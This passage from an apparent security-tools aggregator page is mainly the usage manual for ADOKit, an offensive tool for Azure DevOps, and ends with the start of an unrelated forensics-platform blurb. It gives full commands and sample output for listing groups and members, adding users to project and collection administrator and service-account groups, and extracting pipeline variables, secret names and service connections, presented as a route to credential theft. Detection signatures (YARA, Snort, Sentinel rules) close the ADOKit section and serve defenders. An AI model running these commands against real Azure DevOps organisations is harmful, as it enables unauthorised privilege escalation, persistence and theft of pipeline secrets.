      Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.

      ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: listgroup
      Auth Type: API Key
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 4:48:45 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      UPN | Display Name | Description
      ------------------------------------------------------------------------------------------------------------------------------------------------------------
      [TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items w ithin the team project.
      [TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
      [YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
      [ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
      [MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
      [YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by t he test controllers set up for this project collection.
      [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
      [TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
      [YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
      [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


      ---SNIP---

      4/3/23 20:48:46 Finished execution of listgroup

      Search Groups

      Use Case

      Search for given group(s) in Azure DevOps instance

      Syntax

      Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.

      ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"

      ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"

      Example Output

      C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"

      ==================================================
      Module: searchgroup
      Auth Type: API Key
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 4:48:41 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      UPN | Display Name | Description
      ------------------------------------------------------------------------------------------------------------------------------------------------------------
      [TestProject2]\Build Administrators | Build Administrators | Members of this group can create, mod ify and delete build definitions and manage queued and completed builds.
      [ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
      [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
      [TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
      [MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
      [TestProject2]\Project Administrators | Project Administrators | Members of th is group can perform all operations in the team project.
      [YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
      [ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
      [MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
      [YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
      [TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

      4/3/23 20:48:42 Finished execution of searchgroup

      Get Group Members

      Use Case

      List all group members for a given group

      Syntax

      Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.

      ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"

      ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"

      Example Output

      C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"

      ==================================================
      Module: getgroupmembers
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 9:11:03 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
      [TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
      [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
      [MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
      [TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
      [TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
      [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
      [ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
      [MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

      4/4/23 13:11:09 Finished execution of getgroupmembers

      Get Project Permissions

      Use Case

      Get a listing of who has permissions to a given project.

      Syntax

      Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.

      ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"

      ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"

      Example Output

      C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

      ==================================================
      Module: getpermissions
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 9:11:16 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      UPN | Display Name | Description
      ------------------------------------------------------------------------------------------------------------------------------------------------------------
      [MaraudersMap]\Build Administrators | Build Administrators | Mem bers of this group can create, modify and delete build definitions and manage queued and completed builds.
      [MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
      [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
      [MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
      [MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
      [MaraudersMap]\Readers | Readers | Members of this group have access to the team project.


      [*] INFO: List ing group members for each group that has permissions to this project



      GROUP NAME: [MaraudersMap]\Build Administrators

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


      GROUP NAME: [MaraudersMap]\Contributors

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [MaraudersMap]\Contributo rs | user1@YourOrganization.onmicrosoft.com | User 1
      [MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2


      GROUP NAME: [MaraudersMap]\MaraudersMap Team

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


      GROUP NAME: [MaraudersMap]\Project Administrators

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


      GROUP NAME: [MaraudersMap]\Project Valid Users

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


      GROUP NAME: [MaraudersMap]\Readers

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith

      4/4/23 13:11:18 Finished execution of getpermissions

      Add Project Admin

      Use Case

      Add a user to the Project Administrators group for a given project.

      Syntax

      Provide the addprojectadmin module along with a /project: and /user: for a given user to be added to the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

      ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      Example Output

      C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

      ==================================================
      Module: addprojectadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 2:52:45 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

      [+] SUCCESS: User successfully added

      Group | Mail Address | Display Name
      -------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
      [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
      [MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1

      4/4/23 18:52:47 Finished execution of addprojectadmin

      Remove Project Admin

      Use Case

      Remove a user from the Project Administrators group for a given project.

      Syntax

      Provide the removeprojectadmin module along with a /project: and /user: for a given user to be removed from the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

      ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      Example Output

      C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

      ==================================================
      Module: removeprojectadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 3:19:43 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

      [+] SUCCESS: User successfully removed

      Group | Mail Address | Display Name
      ------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
      [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

      4/4/23 19:19:44 Finished execution of removeprojectadmin

      Add Build Admin

      Use Case

      Add a user to the Build Administrators group for a given project.

      Syntax

      Provide the addbuildadmin module along with a /project: and /user: for a given user to be added to the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

      ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      Example Output

      C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

      ==================================================
      Module: addbuildadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 3:41:51 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

      [+] SUCCESS: User successfully added

      Group | Mail Address | Display Name
      -------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
      [MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

      4/4/23 19:41:55 Finished execution of addbuildadmin

      Remove Build Admin

      Use Case

      Remove a user from the Build Administrators group for a given project.

      Syntax

      Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

      ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      Example Output

      C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

      ==================================================
      Module: removebuildadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 3:42:10 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

      [+] SUCCESS: User successfully removed

      Group | Mail Address | Display Name
      ------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------

      4/4/23 19:42:11 Finished execution of removebuildadmin

      Add Collection Admin

      Use Case

      Add a user to the Project Collection Administrators group.

      Syntax

      Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

      ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: addcollectionadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 4:04:40 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to add user1 to the Project Collection Administrators group.

      [+] SUCCESS: User successfully added

      Group | Mail Address | Display Name
      -------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
      [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
      [YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1

      4/4/23 20:04:43 Finished execution of addcollectionadmin

      Remove Collection Admin

      Use Case

      Remove a user from the Project Collection Administrators group.

      Syntax

      Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

      ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: removecollectionadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 4:10:35 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

      [+] SUCCESS: User successfully removed

      Group | Mail Address | Display Name
      ------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
      [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith

      4/4/23 20:10:38 Finished execution of removecollectionadmin

      Add Collection Build Admin

      Use Case

      Add a user to the Project Collection Build Administrators group.

      Syntax

      Provide the addcollectionbuildadmin module along with a /user: for a given user to be added to the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

      ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: addcollectionbuildadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/5/2023 8:21:39 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

      [+] SUCCESS: User successfully added

      Group | Mail Address | Display Name
      ---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
      [YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

      4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

      Remove Collection Build Admin

      Use Case

      Remove a user from the Project Collection Build Administrators group.

      Syntax

      Provide the removecollectionbuildadmin module along with a /user: for a given user to be removed from the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

      ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: removecollectionbuildadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/5/2023 8:21:59 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

      [+] SUCCESS: User successfully removed

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------

      4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

      Add Collection Build Service Account

      Use Case

      Add a user to the Project Collection Build Service Accounts group.

      Syntax

      Provide the addcollectionbuildsvc module along with a /user: for a given user to be added to the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

      ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: addcollectionbuildsvc
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/5/2023 8:22:13 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

      [+] SUCCESS: User successfully added

      Group | Mail Address | Display Name
      ------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
      [YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

      4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

      Remove Collection Build Service Account

      Use Case

      Remove a user from the Project Collection Build Service Accounts group.

      Syntax

      Provide the removecollectionbuildsvc module along with a /user: for a given user to be removed from the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

      ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: removecollectionbuildsvc
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/5/2023 8:22:27 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

      [+] SUCCESS: User successfully removed

      Group | Mail Address | Display Name
      ----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------

      4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

      Add Collection Service Account

      Use Case

      Add a user to the Project Collection Service Accounts group.

      Syntax

      Provide the addcollectionsvc module along with a /user: for a given user to be added to the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

      ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: addcollectionsvc
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/5/2023 11:21:01 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

      [+] SUCCESS: User successfully added

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
      [YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
      [YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

      4/5/23 15:21:04 Finished execution of addcollectionsvc

      Remove Collection Service Account

      Use Case

      Remove a user from the Project Collection Service Accounts group.

      Syntax

      Provide the removecollectionsvc module along with a /user: for a given user to be removed from the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

      ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: removecollectionsvc
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/5/2023 11:21:43 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

      [+] SUCCESS: User successfully removed

      Group | Mail Address | Display Name
      -------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
      [YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith

      4/5/23 15:21:44 Finished execution of removecollectionsvc

      Get Pipeline Variables

      Use Case

      Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.

      Syntax

      Provide the getpipelinevars module along with a /project: for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all in the /project: argument.

      ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

      ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

      ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

      ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

      Example Output

      C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

      ==================================================
      Module: getpipelinevars
      Auth Type: Cookie
      Project: maraudersmap
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/6/2023 12:08:35 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Pipeline Var Name | Pipeline Var Value
      -----------------------------------------------------------------------------------
      credential | P@ssw0rd123!
      url | http://blah/

      4/6/23 16:08:36 Finished execution of getpipelinevars

      Get Pipeline Secrets

      Use Case

      Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.

      Syntax

      Provide the getpipelinesecrets module along with a /project: for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all in the /project: argument.

      ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

      ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

      ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

      ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

      Example Output

      C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

      ==================================================
      Module: getpipelinesecrets
      Auth Type: Cookie
      Project: maraudersmap
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/10/2023 10:28:37 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Build Secret Name | Build Secret Value
      -----------------------------------------------------
      anotherSecretPass | [HIDDEN]
      secretpass | [HIDDEN]

      4/10/23 14:28:38 Finished execution of getpipelinesecrets

      Get Service Connections

      Use Case

      List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.

      Syntax

      Provide the getserviceconnections module along with a /project: for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all in the /project: argument.

      ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

      ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

      ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

      ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

      Example Output

      C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

      ==================================================
      Module: getserviceconnections
      Auth Type: Cookie
      Project: maraudersmap
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/11/2023 8:34:16 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Connection Name | Connection Type | ID
      --------------------------------------------------------------------------------------------------------------------------------------------------
      Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
      Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
      Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
      Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

      4/11/23 12:34:16 Finished execution of getserviceconnections

      Detection

      Below are static signatures for the specific usage of this tool in its default state:

      • Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
      • See ADOKit Yara Rule in this repo.
      • User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
      • See ADOKit Snort Rule in this repo.
      • Microsoft Sentinel Rules
      • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
      • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

      For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.

      Roadmap

      • Support for Azure DevOps Server

      References

      • https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
      • https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      VolWeb - A Centralized And Enhanced Memory Analysis Platform

      By: Zion3R β€” April 2nd 2024 at 11:30


      VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.


      Objective

      The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.

      By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.

      Project Documentation and Getting Started Guide

      The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.

      [!IMPORTANT] Take time to read the documentation in order to avoid common miss-configuration issues.

      Interacting with the REST API

